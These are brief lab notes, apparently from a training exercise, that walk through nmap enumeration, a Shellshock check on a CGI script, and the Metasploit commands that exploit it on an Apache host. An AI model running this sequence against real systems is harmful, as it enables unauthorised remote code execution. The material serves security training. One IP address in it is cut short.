Metasploit Exploitation

#Enumeration

nmap -sV 192.173.104.3

80/tcp open  http    Apache httpd 2.4.6 ((Unix))

Check the website via a browser:
- http://192.173.104.3/
View Page Source
- http://192.173.104.3/gettime.cgi
- gettime.cgi script can be utilized as the attack vector
Check if the server is vulnerable to ShellShock

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.173

search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS ip address
set TARGETURI /gettime.cgi
exploit

Last updated 1 year ago